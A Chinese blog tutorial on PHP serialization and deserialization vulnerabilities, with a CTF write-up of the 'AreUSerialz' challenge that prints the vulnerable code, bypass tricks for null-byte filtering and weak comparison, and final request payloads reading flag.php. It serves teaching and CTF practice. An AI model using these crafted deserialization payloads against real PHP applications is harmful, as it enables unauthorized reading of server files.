浅谈PHP反序列化漏洞【一】

最新推荐文章于 2022-09-22 11:52:18 发布
最新推荐文章于 2022-09-22 11:52:18 发布
阅读量302 收藏 3
点赞数 1
分类专栏: web安全 文章标签: php 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39664643/article/details/115725284
版权

浅谈PHP反序列化漏洞

0x00.前置知识

PHP大佬请跳至0x01.PHP反序列化漏洞

序列化

PHP程序为了保存和转储对象,提供了序列化的方法,PHP序列化是为了在程序运行的过程中对对象进行转储而产生的。在序列化期间,对象将当前状态写入到临时或持久性存储区。

序列化:将对象转换成字符串。利用函数serialize()实现

反序列化:将序列化后的字符串转换为对象。利用函数unserialize()实现

new一个对象将其实例化,了解序列化后字符串的格式

<?php
class Nets {
    public $name = 'harden';
    protected $age = 31;
    private $country = 'kk';
    public function set_country($country)
    {
        $this->country = $country;
    }
    public function get_country()
    {
        return $this->country;
    }
}

$harden = new Nets();
$harden->set_country('USA');
$str_harden = serialize($harden); //将对象序列化成字符串
echo '<pre>';
echo $str_harden;
file_put_contents('./nets.txt', $str_harden);

image-20210414144058258

序列化后的通用表达式:

O:<length>:"<class name>":<n>:{<field name 1><field value 1>...<field name n><field value n>}

下图解析:

image-20210414145850511

观察序列化后的字符串我们可以得出以下结论

  • 序列化只序列化类属性,不序列化类方法
  • 不同的权限的类属性的格式是不同的

php为了能把整个类对象的各种信息完完整整的压缩,格式化,必然也会将属性的权限序列化进去,即不同的访问修饰符序列化后格式如下:

  • Public: 属性名与其长度一致

    public $name = 'harden';
		|
		|
s:4:"name";s:6:"harden";

  • Protected%00*%00属性名

    protected $age = 31;
		|
		|
s:6:"*age";i:31;  //%00空字符不显示,因此属性长度为6

  • Private%00类名%00属性名

    private $country = 'kk';
		|
		|
s:13:"Netscountry";s:3:"USA"; //%00白字符不显示,因此属性长度为13

我们使用010 editor打开序列化后保存的nets.txt

image-20210415095614652

image-20210414153011857

反序列化

<?php
class Nets {
    public $name = 'harden';
    protected $age = 31;
    private $country = 'kk';
    public function set_country($country)
    {
        $this->country = $country;
    }
    public function get_country()
    {
        return $this->country;
    }
}

$str_harden = file_get_contents('./nets.txt');
$harden = unserialize($str_harden); //将字符串反序列化成对象
echo $harden->get_country();
echo '<pre>';
var_dump($harden);

image-20210414153539419

可以看到,$harden这个对象成功被还原为序列化时的状态,需注意:反序列化的时候一定要保证在当前的作用域环境下可访问该类

魔术方法

PHP中把以两个下划线__开头的方法称为魔术方法,这些方法在PHP中充当了举足轻重的作用。魔术方法都是某种条件下自动执行的方法

__construct()         //创建对象时触发
__destruct()          //对象被销毁时触发
    
__wakeup()			//使用unserialize时触发
__sleep()			//使用serialize时触发
    
__call()              //在对象上下文中调用不可访问的方法时触发
__callStatic()        //在静态上下文中调用不可访问的方法时触发
    
__get()               //用于从无法访问的属性读取数据
__set()               //用于将数据写入无法访问的属性
__isset()             //在不可访问的属性上调用isset()或empty()触发
__unset()             //在不可访问的属性上使用unset()时触发
    
__invoke()            //将对象当作函数调用时触发
__toString()		//把对象当作字符串使用时触发

我们可以测试下与序列化反序列化相关的魔术方法的触发顺序

<?php
class Test {
    public $name = "f4ke";
    private $passwd = "123456";

    public function get_name()
    {
        echo $this->name."<br>";
    }
    public function __construct()
    {
        echo "function __construct is running!"."<br />";
    }

    public function __sleep()
    {
        echo "function __sleep is running!"."<br />";
        return array('name', 'passwd');
    }

    public function __wakeup()
    {
        echo "function __wakeup is running!"."<br />";
    }

    public function __destruct()
    {
        echo "function __destruct is running!"."<br />";
    }
}

// 创建Test对象,触发__construct
$obj = new Test();
// 序列化,触发__sleep
$str = serialize($obj);
echo $str."<br>";
// 反序列化,触发__wakeup
$obj2 = unserialize($str);
$obj2->get_name();
//print_r($str);

image-20210414173907310

0x01.PHP反序列化漏洞

序列化是为了方便对象的传递,节省资源,把对象序列化为一个字符串进行存储,需要用到的时候再反序列化为对象,序列化和反序列化的过程中会自带很多魔术方法

因此,在进行反序列化时,伴随触发的魔术方法被用户输入可控,就有可能存在反序列化漏洞,即反序列化函数 unserialize() 是我们攻击的入口,配合魔术方法就可以形成反序列化漏洞

下面通过一道CTF赛题学习如何利用反序列化漏洞

【AreUSerialz】

image-20210415090706371

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

代码分析如下:

FileHandler类功能

  • 文件处理,根据属性op的值来判断读写文件

执行流程

  • GET方法传入$stris_valid方法过滤不可见字符,进而将传入的$str反序列化为对象$obj
  • 此时PHP脚本执行结束,在销毁对象$obj时,会触发__destruct()方法
  • __destruct()函数中强制将op置“1”,并调用process()方法
  • process()方法通过判断op的值进行写文件的操作

根据文件开头包含flag.php,我们需要通过str参数的输入来成功利用FileHandler类的文件读功能输出flag

根据执行流程我们知道脚本正常执行的情况下,str参数的输入字符串范围只能在ASCII码的[32-125]范围,且只能调用write()方法进行写操作

显然,我们需要编写序列化的代码,并绕过这两个限制,才能成功读取flag.php

  1. 绕过is_valid

PHP序列化的时候private和protected变量会引入不可见空字符\x00,在is_valid函数中被过滤无法反序列化

两种方法可以绕过过滤:

  • 利用php>7.1版本对类属性的检测不严格(对属性类型不敏感)

    在编写漏洞利用代码时将portected属性换成public属性即可

    <?php
class FileHandler {

    public $op = "2";
    public $filename = "flag.php";
    public $content = "123456";
}
$obj = new FileHandler();
$str = serialize($obj);
file_put_contents("./file.txt", $str);
echo $str; 
// O:11:"FileHandler":3:{s:2:"op";s:1:"2";s:8:"filename";s:8:"flag.php";s:7:"content";s:6:"123456";}

  • 在序列化内容中用大写S表示字符串,此时这个字符串就支持将后面的字符串用16进制表示。比如

    s:5:"A<null_byte>B<cr><lf>"; ---->  S:5:"A\00B\09\0D";

    <?php
class FileHandler {

    protected $op = "2";
    protected $filename = "flag.php";
    protected $content = "123456";
}
$obj = new FileHandler();
$str = serialize($obj);
file_put_contents("./file.txt", $str);
echo $str;
// O:11:"FileHandler":3:{s:5:" * op";s:1:"2";s:11:" * filename";s:8:"flag.php";s:10:" * content";s:6:"123456";}

    即,将s->S且空字符NUL->\00处理

    O:11:"FileHandler":3:{s:5:" * op";s:1:"2";s:11:" * filename";s:8:"flag.php";s:10:" * content";s:6:"123456";}
					|
					|
					|
O:11:"FileHandler":3:{S:5:"\00*\00op";S:1:"2";S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:6:"123456";}
  1. 弱类型绕过$this->op判断

要想读取flag.php,必然要使op==="2"不成立且op=="2"成立

  • ===强类型比较 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较
  • == **弱类型比较 ** 在进行比较的时候,会将字符转化为相同类型,再进行比较 (如果比较涉及数字内容的字符串,则字符串会被转换成数值并且按照转化后的数值进行比较)

因此op可以设置如下值即可绕过执行read()方法:

$op = " 2";
$op = 2;

最终的编写利用代码 (其中一种) :

<?php
class FileHandler {

    public $op = " 2";
    public $filename = "flag.php";
    public $content = "123456";
}
$obj = new FileHandler();
$str = serialize($obj);
file_put_contents("./file.txt", $str);
echo $str;

最终请求payload如下:

http://xxx.cn/?str=O:11:"FileHandler":3:{S:5:"\00*\00op";S:2:" 2";S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:6:"123456";}

http://xxx.cn/?str=O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:6:"123456";}

成功读取flag

image-20210415144442624

参考

PHP反序列化学习与实践

一文让PHP反序列化从入门到进阶

F4ke12138
关注
专栏目录
PHP序列化与反序列化
lunan的博客
05-15 310
PHP序列化与反序列化 参考文献:浅谈反序列漏洞 1、目录扫描,使用目录扫描工具dirsearch,扫出来一个www.zip的文件,download。 python dirsearch.py -u http://fd524dc7-eca6-4d21-b9c6-f168d37e3951.node3.buuoj.cn/ -e * -w db/dir.txt 2、查看flag.php,发现是个假的flag,因此查看index.php,查看其中的php代码,发现是文件包含的时候,进行了反序列化的过程,传入一个se
PHP反序列化
2ed
10-30 398
文章简介:# PHP反序列化学习笔记。 目录:# 序列化与反序列化 相关函数 1. serialize()函数 2 .unserialize()函数 序列化的不同结果 例题:D0g3CTF 总结 参考文献 序列化与反序列化# 说到反序列化,就不得不说序列化。 序列化:把对象、数组、字符串等转化为字节序列的过程称为序列化 反序列化:把字节序列恢复为对象、数组、字符串...
php反序列化小结
Amire0x的小乐园
12-13 341
PHP反序列化 又称php对象注入漏洞 基础知识 序列化是对象串行化,对象是一种在内存中存储的数据类型,寿命是随生成该对象的程序的终止而终止,为了持久使用对象的状态,将其通过serialize()函数进行序列化为一行字符串保存为文件,使用时再用unserialize()反序列化为对象 序列化后的格式 bool b:value b:0 //false b:1 //true b代表bool型,冒号后面是值 整数 i:value i:1 i:-1 // i代表里类型 字符 s:length:"v
网鼎杯2020php反序列化,2020-网鼎杯(青龙组)_Web题目 AreUserialz Writeup
weixin_39942992的博客
04-15 248
0x02 AreUSerialz关于s大写小写问题,可以看p神在圈子里发的,我在最后付上截图考点: php反序列化 php特性 利用链构造1.打开页面得到代码如下:include("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;...
PHP反序列化漏洞解析
weixin_43749601的博客
10-31 716
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; //%00*%00属性名 protected $filename; protected $content; function __construct() { //该方法在创建对象时自动调用 $op = "1"; $filename = "/tmp/tm
网安学习-反序列化漏洞
weixin_44770698的博客
06-06 896
初始序列化漏洞
CTF学习-WEB-PHP反序列化-[网鼎杯 2020 青龙组]AreUSerialz 1
qq_43564182的博客
07-13 660
步骤思路 第一:获取flag存储flag.php 第二:两个魔术方法__destruct __construct 第三:传输str参数数据后触发destruct,存在is_valid过滤 第四:__destruct中会调用process,其中op=1写入及op=2读取 第五:涉及对象FileHandler,变量op及filename,content,进行构造输出** 解题 打开网页发现如下代码: <?php include("flag.php"); highlight_file(__FILE__
浅谈常见端口及对应漏洞
weixin_68243135的博客
09-22 1335
“渗透测试的本质就是信息收集“
浅谈PHP序列化,反序列化
weixin_43553654的博客
12-24 444
1.序列化是什么意思呢?序列化就是把本来不能直接存储的数据转换成可存储的数据,并且不会丢掉数据格式 serialize();2.反序列化是什么意思呢?其实就是字面的意思,把序列化的数据,转换成我们需要的格式 unserialize();那么什么是序列化呢,序列化说通俗点就是把一个对象变成可以传输的字符串。举个例子,不知道大家知不知道json格式,这就是一种序列化,有可能就是通过ar...
浅谈在WEBSHELL下如何运行命令.pdf
11-25
类似地,攻击者可能利用不安全的文件上传、反序列化漏洞或其他方式来达到执行命令的目的。 0×05 其他脚本环境下运行命令的方法: 对于其他脚本语言,如Perl、Python、Ruby等,也有相应的函数或模块来执行系统命令...
protected反序列化特点
qq_48511129的博客
12-13 1122
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hel
NSSCTF web刷题
akxnxbshai的博客
08-15 3705
闲来无聊写一写NSSCTF。
CTFSHOW-反序列化
Yb_140的博客
04-06 3662
web254 直接构造 ?username=xxxxxx&password=xxxxxx web255 这关开始使用cookie进行反序列化 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; public function checkVip(){ return $this->
php上传
weixin_33981932的博客
06-04 78
为什么80%的码农都做不了架构师?>>> ...
2020网鼎杯(青龙组)--WEB--AreUSerialz(反序列化
a965527596的博客
05-17 2395
AreUSerialz 1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。 <?php include("flag.php"); highlight_file(__FILE__);
2020网鼎杯青龙组writeup
st0ut的博客
05-25 852
前言 网鼎杯第一场开始了,又是菜鸡自闭的一天。。。 刚开始一直不放web题,让做web的有点难受呀。 web AreUSerialz 打开题目发现源码,是一个反序列化: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __constr
PHP封装成类(文件上传)
zhimab的博客
07-23 2731
<?php /** * Created by PhpStorm. * User: huang * Date: 2017/7/19 * Time: 23:20 */header("content-type:text/html;charset=utf-8");$new = new upload();class upload{ protected $fileName; protected $fileIn
网鼎杯 AreUSerialz反序列化题目
god_Zeo的安全博客
05-11 1013
看了网鼎杯 AreUSerialz反序列化题目wp 对php反序列化又有了学到了新的知识点,之前都没注意到 标题题目是这样的: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op =
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值